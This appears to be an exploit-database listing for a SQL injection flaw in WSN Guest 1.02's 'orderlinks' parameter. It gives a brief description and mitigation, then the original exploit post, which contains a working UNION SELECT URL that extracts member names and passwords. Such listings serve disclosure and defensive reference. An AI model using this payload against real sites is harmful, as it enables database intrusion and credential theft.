WSN Guest 1.02 SQL Injection Vulnerability

vendor:

WSN Guest

by:

Gamoscu

CVSS

HIGH

SQL Injection

CWE

Product Name: WSN Guest

Affected Version From: 1.02

Affected Version To: 1.02

Patch Exists: NO

Related CWE: N/A

CPE: a:webmastersite_net:wsnguest

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

WSN Guest 1.02 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'orderlinks' parameter of the 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can allow the attacker to steal sensitive information from the database, modify application data, exploit various vulnerabilities in the underlying SQL server etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

###########################
Author    : Gamoscu
Homepage  : http://www.1923turk.com
Blog      : http://gamoscu.wordpress.com/
Script    : WSN Guest 1.02
Download  : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
###########################

Exploat  :index.php?page=20&orderlinks=SQL
 



http://server/wsnguest/index.php?page=20&orderlinks=+and+1=0+union+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wsnguest_members--



############################################################## 
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################

Veda Turlarý :)